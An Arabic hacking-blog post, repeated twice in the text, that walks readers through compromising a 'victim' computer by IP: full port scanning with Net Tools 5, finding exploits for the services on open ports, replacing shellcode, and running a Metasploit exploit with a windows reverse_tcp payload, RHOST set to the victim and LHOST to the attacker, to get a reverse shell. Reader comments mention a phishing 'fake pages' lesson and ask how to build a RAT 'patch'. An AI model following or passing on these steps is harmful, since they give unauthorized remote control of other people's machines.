2
اختراق الاجهزة عن طريق الاى بى

لسلام عليكم ورحمة الله وبركاته...
كيف حال الشباب..
سويت شرح بالصور عن كيفية اختراق اي جهاز بالبورتات المفتوحه فيه طبعا اغلب الناس لما يفحصو الاي بي يفحصوه من البورت
1 الى البورت 1024
وهذا خطأ
البورتات اللتي قد تكون مفتوحه بتكون من البورت 1 الى 65535
بس رح يطول حتى يفحصه كله فالحل الامثل للفحص السريع هو برنامج
net tools 5
واظن اغلبكم يعرفه ها البرنامج يحتوي على برامج ضخمة جدا مثل الميتا لما يحتوي على ثغرات هذا البرنامج يحتوي على ادوات يحتاجها كل هكر وتساعدنا في كل اختراقاتنا للمواقع او الاجهزة لتحميل البرنامج



لان في اكثر من port scanner
نروح نختار من
network tools

super fast port scanner and port scanner
شوفو معي الصورة




Roor[1] شرح اختراق الاجهزة عن طريق الاي بي شرح بالصور


لسلام عليكم ورحمة الله وبركاته...
كيف حال الشباب..
سويت شرح بالصور عن كيفية اختراق اي جهاز بالبورتات المفتوحه فيه طبعا اغلب الناس لما يفحصو الاي بي يفحصوه من البورت
1 الى البورت 1024
وهذا خطأ
البورتات اللتي قد تكون مفتوحه بتكون من البورت 1 الى 65535
بس رح يطول حتى يفحصه كله فالحل الامثل للفحص السريع هو برنامج
net tools 5
واظن اغلبكم يعرفه ها البرنامج يحتوي على برامج ضخمة جدا مثل الميتا لما يحتوي على ثغرات هذا البرنامج يحتوي على ادوات يحتاجها كل هكر وتساعدنا في كل اختراقاتنا للمواقع او الاجهزة لتحميل البرنامج

عفوا ,,, لايمكنك مشاهده الروابط لانك غير مسجل لدينا [فقط الأعضاء المسجلين يمكنهم رؤية الروابط. ]

وهذه صورة له مع بعض الادوات


الان في اكثر من port scanner
نروح نختار من
network tools
super fast port scanner and port scanner
شوفو معي الصورة

الان في فرق طبعا بين الاثنين ولكن يفضل فحص الاي بي المستهدف بالبرنامجين
super fast port scanner
سريع جدا ولكنه غير دقيق ومع هذا يفي بالغرض في كشف البورتات المفتوحه الكبيرة
port scanner
بطيء ولكنه دقيق جدا واسرع من غيره واكثر دقه من البرامج الفحص الخارجية
الان بعد ماعرفنا البورتات المفتوحه الصغيرة سواء او الكبيرة
نذهب الى

عفوا ,,, لايمكنك مشاهده الروابط لانك غير مسجل لدينا [فقط الأعضاء المسجلين يمكنهم رؤية الروابط. ]

وهذا مفيد جدا جدا جدا في معرفة البرامج المركبة على البورتات مثلا شفنا احنا
البورت 3050 مفتوح
نختاره من القائمة مثل الصورة

ونختار الثغرة ونحفظها على حسب برمجه كتابتها وطلعت بالبيرل

والكل أظن يعرف يستبدل الشل كود وكيفية استغلال الثغرة هذه وفي شروحات بالقسم سويتها اللي مايعرف يرجع لها
الان نكمل ياشباب
جربت البرنامجين وما زبطو طبعا لانه الجهاز اللي فحصته اكس بي والبورت هذا كان
على لينكس
نجرب بورت مثلا من البورتات الصغار 135 وفي العشرات من البورتات الا ماتلقا واحد تخترق جهاز الضحية عن طريقه وانا اأكلدكم انه 95% من الاجهزة اللي رح تستهدفها رح تخترقها اذا شديت حيلك بهذه الطريقة
الان نشوف الصورة

طيب حلو بس ليش بدال مانتعب نفسنا وندور على ثغرة برنامج RPD
في الملورم ونحفظ الثغرة وننزل برنامج المترجم ونبدل الشل كود ووووو
خلونا ندور على الميتاسبلوت ويفضل تحديثه قبل البحث
نختار exploits اللي فوق
بعدين نحط في search box
اي برنامج من البرامج المركبة على بورت 135 اللي لقيناه في الموروم

حلو الان نفتحه ونطلع الثغرة وننسخها
ونفتح
Consle اللي في الميتاسبلوت
ونكتب
use واسم الثغرة شوفو معي الصورة

الان انا مارح اسوي شرح ميتاسبلوت في شروحات نزلتها في القسم عن الاوامر الاساسية بس عشانكم رح اراجعها معكم
set payload
لتحديد الاستغلال وانا رح حدد استغلال
windows/****l/reverse_tcp
set RHOST اي بي الضحية
set LHOST الاي بي تبعك
set RPORT خليه مثل ماهو لانه هو البورت اللي لقيناه مفتوح للضحية وهو بورت الثغرة الاصلي
set LPORT هنا نحط اي بورت مفتوح بالمودم عشان يجي عليه التبليغ ولازم يكون البورت مو شغال يعني متنصت عليه بالبويزن او البيفروست او سباي نت
ولتشغيل الثغرة نحط
exploit


وهاقد تم الاختراق عن طريق الاتصال العكسي كما قلنا
windows/****l/reverse_tcp
ولكن انا افضل النيت كات
وكذا طبقنا على بورت واحد بدنا نشوف شروحاتكم على البورتات الكبرى والاخرى اللي مانشرحت من قبل وكل واحد يلاقي ثغرة برنامج على بورت 8080 يسدح رابط الثغرة او الكود لانه اكتشفت انه اغلب اجهزتنا او كلها مفتوح فيها بورت 8080
وهذا مفيد جدا جدا جدا في معرفة البرامج المركبة على البورتات مثلا شفنا احنا
البورت 3050 مفتوح
نختاره من القائمة مثل الصورة




ونختار الثغرة ونحفظها على حسب برمجه كتابتها وطلعت بالبيرل



والكل أظن يعرف يستبدل الشل كود وكيفية استغلال الثغرة هذه وفي شروحات بالقسم سويتها اللي مايعرف يرجع لها
الان نكمل ياشباب
جربت البرنامجين وما زبطو طبعا لانه الجهاز اللي فحصته اكس بي والبورت هذا كان
على لينكس
نجرب بورت مثلا من البورتات الصغار 135 وفي العشرات من البورتات الا ماتلقا واحد تخترق جهاز الضحية عن طريقه وانا اأكلدكم انه 95% من الاجهزة اللي رح تستهدفها رح تخترقها اذا شديت حيلك بهذه الطريقة
الان نشوف الصورة



طيب حلو بس ليش بدال مانتعب نفسنا وندور على ثغرة برنامج RPD
في الملورم ونحفظ الثغرة وننزل برنامج المترجم ونبدل الشل كود ووووو
خلونا ندور على الميتاسبلوت ويفضل تحديثه قبل البحث
نختار exploits اللي فوق
بعدين نحط في search box
اي برنامج من البرامج المركبة على بورت 135 اللي لقيناه في الموروم



حلو الان نفتحه ونطلع الثغرة وننسخها
ونفتح
Consle اللي في الميتاسبلوت
ونكتب
use واسم الثغرة شوفو معي الصورة



الان انا مارح اسوي شرح ميتاسبلوت بس عشانكم رح اراجعها معكم
set payload
لتحديد الاستغلال وانا رح حدد استغلال
windows/****l/reverse_tcp
set RHOST اي بي الضحية
set LHOST الاي بي تبعك
set RPORT خليه مثل ماهو لانه هو البورت اللي لقيناه مفتوح للضحية وهو بورت الثغرة الاصلي
set LPORT هنا نحط اي بورت مفتوح بالمودم عشان يجي عليه التبليغ ولازم يكون البورت مو شغال يعني متنصت عليه بالبويزن او البيفروست او سباي نت
ولتشغيل الثغرة نحط
exploit



وهاقد تم الاختراق عن طريق الاتصال العكسي كما قلنا
windows/****l/reverse_tcp
ولكن انا افضل النيت كات
وكذا طبقنا على بورت واحد بدنا نشوف شروحاتكم على البورتات الكبرى والاخرى اللي مانشرحت من قبل وكل واحد يلاقي ثغرة برنامج على بورت 8080 يسدح رابط الثغرة او الكود لانه اكتشفت انه اغلب اجهزتنا او كلها مفتوح فيها بورت 8080

2 التعليقات:

سامي اليزيدي يقول...

سلام عليكم
اولا اهنيك على مدونتك الاكثر من رائعه بس فيه اشياء يبيلها تعديل
مثلا هذ الدرس الصور كل ابوها صورة بس في كرتون هذي مشكلة
ثانيا الروابط نصها متشتغل يقولي الايبي مدري شنوا ومتصفحك مو اكسبلور ياليت تجيب روابط تقبل متصفح قوقل كروم
ثالث شيء درس الصفحات المزوره مايشتغل من الروابط كلها الا رابط وهو ذا http://lakamora.com/home.php
وهذا عندي من زمان وابي غيره
رابع شيء وش افضل متصفح لمدونتك
خامس شيء ياليت تتابع تعليقات المتابعين لمدونتك والمنتقدين لكي تستفيد من نقدهم وتقدم لمدونتك الافضل
تقبل مروري اخوك فالله smsm_007

ميدو كول يقول...

عاوز طريقه لعمل الباتش -_-

إرسال تعليق

    شريط آخر المواضيع
 
تعريب وتطوير مدونة الفوتوشوب للعرب
مدونة الهكر والاختراق © 2010 | عودة الى الاعلى
Designed by Chica Blogger